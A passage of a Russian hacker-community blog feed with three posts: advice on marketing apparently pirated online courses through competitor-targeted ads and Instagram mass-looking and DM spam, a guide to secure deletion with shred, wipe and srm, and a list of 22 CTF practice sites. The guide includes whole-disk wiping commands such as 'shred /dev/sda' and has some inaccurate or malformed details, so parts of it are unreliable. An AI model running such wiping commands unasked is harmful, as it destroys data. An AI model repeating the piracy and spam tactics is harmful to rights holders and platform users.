  &lt;p&gt;Как настраивать таргет - можете посмотреть в интернете, дам несколько советов: выбирайте сообщество инфоцыгана и давайте рекламу по его активным пользователям. Акцент стоит ставить на разнице цены, мол мы продаем те же курсы за 1% от реальной стоимости, а можно получить вообще бесплатно. Создайте несколько разных объявлений и протестируйте, какое лучше работает. Цену советую ставить за переход. Экспериментируйте! Таргет в инстаграм работает через фейсбук, там нельзя показывать объявление по конкурентам, поэтому пользуйтесь парсерами и давайте объявление по своей аудитории.&lt;/p&gt;
  &lt;p&gt;2. Инстаграм&lt;/p&gt;
  &lt;p&gt;Этим способом пользуюсь реже, поэтому многого не скажу. Скажу только, что можете использовать масслукинг (массовый просмотр историй, смотрит по 800к-1.5м в сутки). Многие заходят на аккаунт и видят запись\историю, что курсы инфобизнесменов есть в телеграмме (естественно, предварительно нужно добавить историю\пост и смотреть только истории подписчиков инфоцыган). Есть масса сервисов масслукинга с бесплатным пробным периодом, погуглите. Также попробуйте массфоловинг, масслайкинг и рассылку в директ (бан выдают чаще).&lt;/p&gt;
  &lt;p&gt;Можете придумать что-то своё, есть где разгуляться. Включите фантазию и пробуйте, главное – заполучить заинтересованного реферала\клиента.&lt;/p&gt;
  &lt;p&gt;Напоследок для мотивации скрин выплат:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/399ad7c80edc214ff1819.jpg&quot; width=&quot;1007&quot; /&gt;
  &lt;/figure&gt;

</content></entry><entry><id>hiddencommunity:u-wxDUrDT</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/u-wxDUrDT?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Безопасно удаляем файлы</title><published>2020-06-06T11:22:34.745Z</published><updated>2020-06-06T11:22:34.745Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/ff/0c/ff0c9d16-855d-4ea3-9ee6-2fde67236ffb.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/63/27/63279941-ff14-4211-ab17-a0cfb3eb1437.jpeg&quot;&gt;Всем салют, дорогие друзья!
Сегодня мы поговорим об очень важном аспекте безопасности и анонимности:
безвозвратное удаление файлов и очистка диска.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/63/27/63279941-ff14-4211-ab17-a0cfb3eb1437.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Всем салют, дорогие друзья!&lt;br /&gt;Сегодня мы поговорим об очень важном аспекте безопасности и анонимности:&lt;br /&gt;безвозвратное удаление файлов и очистка диска.&lt;/p&gt;
  &lt;p&gt;Для начала напомним, что статья написана в образовательных целях. Мы не несем ответственности за любой возможный вред, причиненный материалами данной статьи.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Когда вы удаляете файл, даже минуя или очищая корзину, обычно он не удаляется&lt;/strong&gt; в физическом смысле: «вычёркивается» только информация о нём, занимаемое им место считается свободным и в любое время туда может быть записан новый файл. &lt;strong&gt;Но пока это не произойдёт (запись новых данных), старый файл может быть успешно восстановлен.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Примерно это же происходит при «быстром форматировании», т.е. удаляется информация о существующих файлах, но сами данные не стираются и не перезаписываются.&lt;/p&gt;
  &lt;p&gt;Кроме программ для восстановления файлов имеется техника под названием магнитно-силовая микроскопия — &lt;strong&gt;Magnetic Force Microscopy&lt;/strong&gt; (MFM), которая позволяет любому в меру финансируемому оппоненту восстановить последние два&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/3f/4f/3f4f6efc-30cb-4e71-baf7-09be8b0d6bc9.png&quot; width=&quot;796&quot; /&gt;
    &lt;figcaption&gt;магнитно-силовая микроскопия — &lt;strong&gt;Magnetic Force Microscopy&lt;/strong&gt; (MFM)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Shred&lt;/h2&gt;
  &lt;p&gt;&lt;strong&gt;Программа предустановлена в Kali Linux. Является частью пакета coreutils.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Shred&lt;/strong&gt; случайными числами заполняет место, занятое файлом. И уже, даже восстановив ваш удалённый файл, его будет невозможно прочитать. По умолчанию shred не удаляет файл, для этого используется параметр --remove (-u).&lt;/p&gt;
  &lt;pre&gt;shred -u /path/to/file&lt;/pre&gt;
  &lt;p&gt;В shred заложен&lt;strong&gt; 25-тикратный цикл&lt;/strong&gt;, то есть &lt;strong&gt;программа перезапишет файл случайным содержимым 25 раз&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Чтобы изменить это значение, например на 35-тикратный:&lt;/p&gt;
  &lt;pre&gt;shred -u -n 35 /path/to/file&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Если ваша паранойя достигла ещё большего уровня, то вам подойдут следующие советы:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Чтобы спрятать информацию о том, что вы зачищали файл, используйте параметр -z, добавляющий нули в конец файла — это сделает файл непохожим на зашифрованный. Если вам интересно наблюдать за процессом перезаписи, параметр -v (verbose) служит для подробного вывода информации прогресса.&lt;/p&gt;
  &lt;pre&gt;shred -u -z /path/to/file&lt;/pre&gt;
  &lt;p&gt;Если хотите удалить сразу несколько файлов, то укажите их в таком формате:&lt;/p&gt;
  &lt;pre&gt;shred -u -z -n 30 /path/to/file1 /path/to/file2 /path/to/file3&lt;/pre&gt;
  &lt;p&gt;или же можно использовать маску:&lt;/p&gt;
  &lt;pre&gt;shred -u -z -n *.txt&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Shred также может удалить содержимое всего жёсткого диска командой&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;shred /dev/sda&lt;/pre&gt;
  &lt;p&gt;Естественно, время выполнения операций напрямую зависит от размера файла и скорости записи.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Единственным минусом является то, что shred не умеет удалять каталоги. В этом нам на помощь приходит утилита wipe.&lt;/strong&gt;&lt;/p&gt;
  &lt;h2&gt;Wipe&lt;/h2&gt;
  &lt;p&gt;&lt;strong&gt;Wipe &lt;/strong&gt;- многофункциональная консольная утилита для безвозвратного удаления отдельных файлов и каталогов, а также зачистки разделов, дисков и внешних носителей(флешек).&lt;/p&gt;
  &lt;p&gt;Домашняя страница - &lt;a href=&quot;http://lambda-diode.com/software/wipe/&quot; target=&quot;_blank&quot;&gt;http://lambda-diode.com/software/wipe/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Установка в Kali Linux, Debian, Ubuntu, Linux Mint:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;sudo apt-get install wipe&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Установка в BlackArch:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;sudo pacman -S wipe&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Для быстрого стирания вы можете использовать её примерно так:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;wipe -r -q /путь/для/затирания&lt;/pre&gt;
  &lt;blockquote&gt;&lt;strong&gt;Внимание: &lt;/strong&gt;Wipe надёжно работает только для магнитной памяти, следовательно, для твердотельных дисков (памяти) используйте другие методы.&lt;/blockquote&gt;
  &lt;h2&gt;secure-delete (srm, sfill, sswap)&lt;/h2&gt;
  &lt;p&gt;Пакет &lt;strong&gt;secure-delete&lt;/strong&gt; включает в себя три утилиты&lt;strong&gt;(srm, sfill, sswap&lt;/strong&gt;), которые безопасно очищают файлы, диски, раздел подкачки и память.&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;srm&lt;/strong&gt; выполняет безопасную перезапись/переименование/удаление целевого файла(ов).&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;sfill&lt;/strong&gt; выполняет безопасную перезапись свободного пространства на разделе, в котором находится указанная директория и всех свободных индексных дескрипторов (inode) указанного каталога.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;sswap&lt;/strong&gt; делает безопасную перезапись раздела подкачки.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Запуск srm со стандартными (безопасными) настройками с более подробным выводом для стирания диска /dev/sdX:&lt;/p&gt;
  &lt;pre&gt;srm -v /dev/sdX&lt;/pre&gt;

</content></entry><entry><id>hiddencommunity:XMQuR4dv2</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/XMQuR4dv2?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Лучшие ресурсы для практики взлома</title><published>2020-06-05T10:22:33.272Z</published><updated>2020-06-05T10:22:33.272Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/6b/78/6b78429d-d1ca-4d88-8a32-2d8583b91ed2.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/30/28/302841fd-e72f-43e7-a649-d5d21884da44.jpeg&quot;&gt;Сегодня разберем аж 22 ресурса, которые помогут практиковаться в искусстве взлома и ставить защиту на свои сервера. Площадки, обозреваемые в статье, доступны только на английском языке.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/30/28/302841fd-e72f-43e7-a649-d5d21884da44.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;em&gt;Сегодня разберем аж 22 ресурса, которые помогут практиковаться в искусстве взлома и ставить защиту на свои сервера. Площадки, обозреваемые в статье, доступны только на английском языке.&lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;1) &lt;strong&gt;CTF365- &lt;/strong&gt;ctf365.com&lt;/p&gt;
  &lt;p&gt;Пользователи CTF365 устанавливают и защищают свои собственные серверы одновременно с атаками на серверы других пользователей. CTF365 подойдёт профессионалам в области безопасности, которые хотят приобрести наступательные навыки, или системным администраторам, заинтересованным в улучшении своих защитных навыков. Если вы новичок в инфосеке, вы можете зарегистрировать бесплатную учетную запись для начинающих и познакомиться с ним с помощью нескольких предварительно настроенных уязвимых серверов.&lt;/p&gt;
  &lt;p&gt;2) &lt;strong&gt;OVERTHEWIRE- &lt;/strong&gt;overthewire.org/wargames&lt;/p&gt;
  &lt;p&gt;OverTheWire подойдёт всем желающим изучить теорию информационной безопасности и применить её на практике независимо от своего опыта. Новичкам следует начать с задач уровня Bandit, поскольку они необходимы для дальнейшего решения других задач.&lt;/p&gt;
  &lt;p&gt;3) &lt;strong&gt;HACKING-LAB- &lt;/strong&gt;&lt;a href=&quot;https://www.hacking-lab.com/error/refused_cookies.html&quot; target=&quot;_blank&quot;&gt;[URL=&amp;quot;http://www.hacking-lab.com/index.html[/URL]&amp;quot;]www.hacking-lab.com/index.html&lt;/a&gt;[/URL]&lt;/p&gt;
  &lt;p&gt;Hacking-Lab предоставляют задачи CTF для European Cyber Security Challenge, но они также проводят на своей платформе регулярные соревнования, в которых может участвовать каждый. Просто зарегистрируйтесь, настройте vpn и выберите себе задачу по вкусу.&lt;/p&gt;
  &lt;p&gt;4) &lt;strong&gt;PWNABLE.KR- &lt;/strong&gt;pwnable.kr&lt;/p&gt;
  &lt;p&gt;Данная площадка фокусируется на pwn-задачах, подобных CTF, суть которых заключается в поиске, чтении и отправке файлов-флагов, которые есть в каждой задаче. Для доступа к содержимому файлов вы должны использовать навыки программирования, реверс-инжиниринга или эксплуатации уязвимостей, прежде чем сможете отправить решение.&lt;/p&gt;
  &lt;p&gt;Задачи делятся на 4 уровня сложности: лёгкий — для новичков, средний, сложный и хардкор, где задачи требуют нестандартных подходов для решения.&lt;/p&gt;
  &lt;p&gt;5)&lt;strong&gt; IO- &lt;/strong&gt;io.netgarage.org&lt;/p&gt;
  &lt;p&gt;IO — это варгейм от создателей netgarage.org, сообщества, в котором единомышленники делятся знаниями о безопасности, искусственном интеллекте, VR и многом другом. Было создано 3 версии варгейма: IO, IO64 и IOarm, из них всех IO является наиболее зрелой. Подключайтесь к IO через SSH и можете приниматься за работу.&lt;/p&gt;
  &lt;p&gt;6) &lt;strong&gt;SMASHTHESTACK- &lt;/strong&gt;smashthestack.org&lt;/p&gt;
  &lt;p&gt;SmashTheStack состоит из 7 различных варгеймов: Amateria, Apfel (в настоящее время офлайн), Blackbox, Blowfish, CTF (в настоящее время офлайн), Logic и Tux. Каждый варгейм содержит множество задач, начиная от стандартных уязвимостей и заканчивая задачами на реверс-инжиниринг.&lt;/p&gt;
  &lt;p&gt;7) &lt;strong&gt;MICROCORRUPTION- &lt;/strong&gt;microcorruption.com/login&lt;/p&gt;
  &lt;p&gt;Microcorruption представляет собой CTF, в котором вам нужно «зареверсить» вымышленные электронные блокирующие устройства Lockitall. Устройства Lockitall защищают облигации, размещённые на складах, принадлежащих вымышленной компании Cy Yombinator. На пути к краже облигаций вы познакомитесь с ассемблером, узнаете, как использовать отладчик, пошагово выполнять код, устанавливать точки останова и исследовать память.&lt;/p&gt;
  &lt;p&gt;8) &lt;strong&gt;REVERSING.KR- &lt;/strong&gt;reversing.kr/index.php&lt;/p&gt;
  &lt;p&gt;Здесь вы можете найти 26 задач для проверки ваших навыков взлома и реверс-инжиниринга. Сайт не обновлялся с конца 2012 года, но имеющиеся задачи по-прежнему являются ценными учебными ресурсами.&lt;/p&gt;
  &lt;p&gt;9) &lt;strong&gt;HACK THIS SITE- &lt;/strong&gt;&lt;a href=&quot;https://www.hackthissite.org/pages/call-to-action/blm.php&quot; target=&quot;_blank&quot;&gt;www.hackthissite.org&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Hack This Site — бесплатный сайт c варгеймами для проверки и улучшения ваших навыков хакинга. Нам нём можно найти множество хакерских задач в нескольких категориях, включая базовые задачи, реалистичные задачи, приложения, программирование, фрикинг, JavaScript, форензику, стеганографию и т.д. Также сайт может похвастаться активным сообществом с большим каталогом хакерских статей и форумом для обсуждения вопросов, связанных с безопасностью. Недавно было объявлено, что кодовая база сайта будет пересмотрена, поэтому в ближайшие месяцы можно ожидать большие улучшения.&lt;/p&gt;
  &lt;p&gt;10) &lt;strong&gt;W3CHALLS- &lt;/strong&gt;w3challs.com&lt;/p&gt;
  &lt;p&gt;W3Challs — это обучающая платформа с множеством задач в различных категориях, включая хакинг, варгеймы, форензику, криптографию, стеганографию и программирование. Цель платформы — предоставить реалистичные задачи. В зависимости от сложности решённой задачи вы получаете баллы. Также есть форум, на котором можно обсуждать и решать задачи с другими участниками.&lt;/p&gt;
  &lt;p&gt;11) &lt;strong&gt;PWN0- &lt;/strong&gt;pwn0.com&lt;/p&gt;
  &lt;p&gt;Площадка pwn0 — это VPN, в которой происходит почти всё, что угодно. Сражайтесь против ботов или пользователей и набирайте очки, получая контроль над другими системами.&lt;/p&gt;
  &lt;p&gt;12) &lt;strong&gt;EXPLOIT EXERCISES- &lt;/strong&gt;exploit-exercises.com&lt;/p&gt;
  &lt;p&gt;Exploit Exercises предлагает множество виртуальных машин, документацию и задачи, которые пригодятся в изучении повышения привилегий, анализа уязвимостей, разработки эксплойтов, отладки, реверс-инжиниринга и т.д.&lt;/p&gt;
  &lt;p&gt;13) &lt;strong&gt;RINGZER0 TEAM ONLINE CTF- &lt;/strong&gt;ringzer0team.com&lt;/p&gt;
  &lt;p&gt;RingZer0 Team Online CTF предлагает более 200 задач, которые позволят вам проверить навыки взлома по нескольким направлениям — от криптографии, анализа вредоносных программ до SQL-инъекции, шеллкодинга и многого другого. После того, как вы нашли решение задачи, вы можете отправить его RingZer0 Team. Если ваше решение будет принято, вы получите RingZer0Gold, которое можно обменять на подсказки во время решения задач.&lt;/p&gt;
  &lt;p&gt;14) &lt;strong&gt;HELLBOUND HACKERS- &lt;/strong&gt;&lt;a href=&quot;https://www.hellboundhackers.org/&quot; target=&quot;_blank&quot;&gt;www.hellboundhackers.org&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;На Hellbound Hackers можно найти традиционные задачи с эксплойтами и такие форматы задач, которых нет на других ресурсах. Например, патчинг приложений и задачи, ограниченные по времени. В задачах с патчингом вам даётся уязвимый фрагмент кода и вам нужно предложить исправление этой уязвимости.&lt;/p&gt;
  &lt;p&gt;15) &lt;strong&gt;TRY2HACK- &lt;/strong&gt;&lt;a href=&quot;http://www.try2hack.nl/&quot; target=&quot;_blank&quot;&gt;www.try2hack.nl&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Try2Hack — один из старейших сайтов по улучшению навыков хакинга, который всё ещё остаётся на плаву. Он предлагает несколько задач, чтобы развлечься. Задачи разнообразны и по мере продвижения становятся всё сложнее.&lt;/p&gt;
  &lt;p&gt;16) &lt;strong&gt;HACK.ME- &lt;/strong&gt;hack.me&lt;/p&gt;
  &lt;p&gt;Hack.me представляет собой большую коллекцию уязвимых веб-приложений для применения навыков взлома на практике. Все приложения предоставляются сообществом и каждое из них можно запустить «на лету» в безопасной, изолированной песочнице.&lt;/p&gt;
  &lt;p&gt;17) &lt;strong&gt;HACKTHIS!!- &lt;/strong&gt;&lt;a href=&quot;https://defendtheweb.net/?hackthis&quot; target=&quot;_blank&quot;&gt;www.hackthis.co.uk&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;HackThis!! состоит из 50+ задач разного уровня, за решение каждой из которых вы получаете определённое количество очков в зависимости от уровня сложности. Подобно Hack This Site, у HackThis!! также есть живое сообщество, многочисленные статьи и новости о хакинге, а также форум, на котором вы можете обсудить задачи и вопросы, связанные с безопасностью.&lt;/p&gt;
  &lt;p&gt;18) &lt;strong&gt;ENIGMA GROUP- &lt;/strong&gt;&lt;a href=&quot;https://www.enigmagroup.org/&quot; target=&quot;_blank&quot;&gt;www.enigmagroup.org&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Enigma Group содержит более 300 задач с акцентом на топ-10 эксплойтов OWASP. Сайт имеет почти 48000 активных участников и проводит еженедельные CTF-соревнования, а также еженедельные и ежемесячные конкурсы.&lt;/p&gt;
  &lt;p&gt;19) &lt;strong&gt;GOOGLE GRUYERE- &lt;/strong&gt;google-gruyere.appspot.com&lt;/p&gt;
  &lt;p&gt;Google Gruyere показывает, как можно эксплуатировать уязвимости веб-приложений и как от этого защититься. Вы сможете провести реальное тестирование на проникновение и фактически взломать настоящее приложение, используя атаки вроде XSS и XSRF.&lt;/p&gt;
  &lt;p&gt;20) &lt;strong&gt;GAME OF HACKS- &lt;/strong&gt;&lt;a href=&quot;http://www.gameofhacks.com/&quot; target=&quot;_blank&quot;&gt;www.gameofhacks.com&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Game of Hacks показывает вам набор фрагментов кода в виде викторины с несколькими вариантами выбора, а вы должны определить правильную уязвимость в коде. Этот сайт немного выделяется из этого списка, но тем не менее это хорошая игра для выявления уязвимостей в коде.&lt;/p&gt;
  &lt;p&gt;21) &lt;strong&gt;ROOT ME- &lt;/strong&gt;&lt;a href=&quot;https://www.root-me.org/&quot; target=&quot;_blank&quot;&gt;www.root-me.org&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Root Me предлагает более 200 задач и более 50 виртуальных сред, позволяющих вам применить на практике свои навыки взлома в различных сценариях. Это определённо один из лучших сайтов в данном списке.&lt;/p&gt;
  &lt;p&gt;22) &lt;strong&gt;CTFTIME- &lt;/strong&gt;ctftime.org&lt;/p&gt;
  &lt;p&gt;Хотя CTFtime не является хакерским сайтом, как другие в этом списке, это отличный ресурс, чтобы оставаться в курсе CTF-соревнований, происходящих по всему миру. Поэтому, если вы заинтересованы в присоединении к CTF-команде или участии в соревновании, вам стоит сюда заглянуть.&lt;/p&gt;

</content></entry></feed>